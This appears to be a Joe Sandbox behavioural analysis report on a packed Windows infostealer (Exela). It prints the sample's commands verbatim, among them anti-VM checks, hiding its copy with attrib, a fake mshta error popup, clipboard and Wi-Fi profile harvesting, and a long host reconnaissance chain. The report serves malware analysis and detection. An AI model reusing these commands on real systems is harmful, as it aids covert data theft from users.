Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C	0_2_00007FF6850C7E4C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D72BC	0_2_00007FF6850D72BC
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850B7950	0_2_00007FF6850B7950
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D6370	0_2_00007FF6850D6370
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C1E94	0_2_00007FF6850C1E94
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C86D0	0_2_00007FF6850C86D0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C36E0	0_2_00007FF6850C36E0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D1EE4	0_2_00007FF6850D1EE4
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C5F30	0_2_00007FF6850C5F30
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D471C	0_2_00007FF6850D471C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C2D50	0_2_00007FF6850C2D50
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D6D70	0_2_00007FF6850D6D70
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D65EC	0_2_00007FF6850D65EC
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C1880	0_2_00007FF6850C1880
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C20A0	0_2_00007FF6850C20A0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850B1F50	0_2_00007FF6850B1F50
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D0F38	0_2_00007FF6850D0F38
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7E4C	0_2_00007FF6850C7E4C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850B8FD0	0_2_00007FF6850B8FD0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D9FF8	0_2_00007FF6850D9FF8
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850CE01C	0_2_00007FF6850CE01C
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D0F38	0_2_00007FF6850D0F38
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C1A84	0_2_00007FF6850C1A84
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850D4280	0_2_00007FF6850D4280
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C22A4	0_2_00007FF6850C22A4
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C3AE4	0_2_00007FF6850C3AE4
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850CEB30	0_2_00007FF6850CEB30
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C1C90	0_2_00007FF6850C1C90
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850CE4B0	0_2_00007FF6850CE4B0
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850C7C98	0_2_00007FF6850C7C98
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Code function: 0_2_00007FF6850CA430	0_2_00007FF6850CA430

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: String function: 00007FF6850B2B30 appears 47 times

Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: python3.dll.0.dr

Static PE information: No import functions for PE file found

Source: 9afaXJv52z.exe	Binary or memory string: OriginalFilename vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1249492871.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1249717286.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244115829.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244442453.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244809327.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1251123271.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244934313.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244562675.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1245025869.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1250812728.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1245362425.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000000.1242938460.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameExela.exej% vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1243849896.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: !OriginalFilename_asyncio.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244016171.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1245140379.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244644310.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1250672887.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1244334483.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1245247870.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1249826162.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepython3.dll. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000000.00000003.1245483808.00000170C08E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000002.00000000.1252176030.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameExela.exej% vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe, 00000002.00000002.1564172723.0000020DAB880000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamepython3.dll. vs 9afaXJv52z.exe
Source: 9afaXJv52z.exe	Binary or memory string: OriginalFilenameExela.exej% vs 9afaXJv52z.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Section loaded: sbiedll.dll			Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll

Source: libcrypto-1_1.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
Source: libssl-1_1.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
Source: python311.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9993579269724483
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9976298969897524
Source: _rust.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.99938125
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9937485999103942

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@124/95@4/6

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Code function: 0_2_00007FF6850B8560 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF6850B8560

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\Users\user\AppData\Local\ExelaUpdateService\

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Mutant created: \Sessions\1\BaseNamedObjects\E
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File created: C:\Users\user~1\AppData\Local\Temp\_MEI67202

Jump to behavior

Source: 9afaXJv52z.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\9afaXJv52z.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

File read: C:\Windows\System32\drivers\etc\hosts

Source: 9afaXJv52z.exe	ReversingLabs: Detection: 52%
Source: 9afaXJv52z.exe	Virustotal: Detection: 65%

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File read: C:\Users\user\Desktop\9afaXJv52z.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9afaXJv52z.exe C:\Users\user\Desktop\9afaXJv52z.exe
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Users\user\Desktop\9afaXJv52z.exe C:\Users\user\Desktop\9afaXJv52z.exe
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get Manufacturer
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\HOSTNAME.EXE hostname
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\query.exe query user
Source: C:\Windows\System32\query.exe	Process created: C:\Windows\System32\quser.exe C:\Windows\system32\quser.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net localgroup administrators
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net user guest
Source: C:\Windows\System32\attrib.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Users\user\Desktop\9afaXJv52z.exe C:\Users\user\Desktop\9afaXJv52z.exe	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "gdb --version"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-\|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get Manufacturer	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
